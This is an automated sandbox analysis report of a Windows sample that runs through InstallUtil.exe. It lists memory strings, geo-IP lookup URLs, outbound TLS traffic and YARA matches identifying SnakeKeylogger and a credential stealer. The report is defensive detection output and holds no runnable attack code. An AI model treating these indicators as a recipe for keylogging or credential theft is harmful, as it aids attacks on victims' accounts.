                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002BEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2528573106.0000000002C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: sS7Jrsk0Z7.exeString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: InstallUtil.exe, 0000000A.00000002.2531605024.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2531605024.0000000003EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 0000000A.00000002.2528573106.0000000002D63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49992 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000A.00000002.2525054374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: sS7Jrsk0Z7.exe PID: 6676, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0901BBB8 CreateProcessAsUserW,1_2_0901BBB8
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_010B80301_2_010B8030
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_010B72F01_2_010B72F0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_010BBC381_2_010BBC38
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_02B20FA01_2_02B20FA0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_02B205201_2_02B20520
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_050062A11_2_050062A1
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_050062B01_2_050062B0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_050048EC1_2_050048EC
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_076DBEE01_2_076DBEE0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_076D44181_2_076D4418
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_076D00401_2_076D0040
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078043281_2_07804328
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0780FA881_2_0780FA88
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078043181_2_07804318
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0780E2501_2_0780E250
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078B47A01_2_078B47A0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078BFD401_2_078BFD40
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078BFD501_2_078BFD50
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078B003E1_2_078B003E
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078B00401_2_078B0040
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798F7E01_2_0798F7E0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798DF691_2_0798DF69
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798CAD01_2_0798CAD0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798D6F01_2_0798D6F0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798BA381_2_0798BA38
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_07987E401_2_07987E40
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_07983CBA1_2_07983CBA
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0798D6CA1_2_0798D6CA
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_07982D111_2_07982D11
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_07982D201_2_07982D20
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09018DA81_2_09018DA8
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090114C01_2_090114C0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09014BF81_2_09014BF8
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09016A501_2_09016A50
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0901C2801_2_0901C280
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09019D101_2_09019D10
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09015C101_2_09015C10
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090110101_2_09011010
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090120701_2_09012070
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_0901A4781_2_0901A478
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090110901_2_09011090
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090110A01_2_090110A0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090114B11_2_090114B1
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090113081_2_09011308
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090113181_2_09011318
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090187501_2_09018750
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090107B01_2_090107B0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_090107C01_2_090107C0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09011FC01_2_09011FC0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09014BE91_2_09014BE9
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09010E581_2_09010E58
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09010E681_2_09010E68
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_09010AB01_2_09010AB0
                    Source: C:\Users\user\Desktop\sS7Jrsk0Z7.exeCode function: 1_2_078B47901_2_078B4790
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123C14710_2_0123C147
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123536210_2_01235362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123D27810_2_0123D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123C46F10_2_0123C46F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123C73810_2_0123C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_012369A010_2_012369A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123E98810_2_0123E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123CA0810_2_0123CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_01233AA110_2_01233AA1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_01239DE010_2_01239DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123CCD810_2_0123CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123CFAA10_2_0123CFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_01236FC810_2_01236FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_01233E0910_2_01233E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123F63110_2_0123F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123E97A10_2_0123E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_012339EE10_2_012339EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_012329EC10_2_012329EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 10_2_0123FA8810_2_0123FA88
                    Source: sS7Jrsk0Z7.exeStatic PE information: invalid certificate
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1806875709.0000000005070000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBamokinepApp.dll< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000000.1265966992.0000000000F14000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQuick Any2Ico.exe< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1798101450.0000000003028000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003C2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBamokinepApp.dll< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1797402151.000000000111E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1810705411.0000000007960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003D18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBamokinepApp.dll< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exe, 00000001.00000002.1805361382.0000000003DC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exeBinary or memory string: OriginalFilenameQuick Any2Ico.exe< vs sS7Jrsk0Z7.exe
                    Source: sS7Jrsk0Z7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3e4ca8a.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 10.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3dc68da.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3e099ba.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.sS7Jrsk0Z7.exe.3c2f6d0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
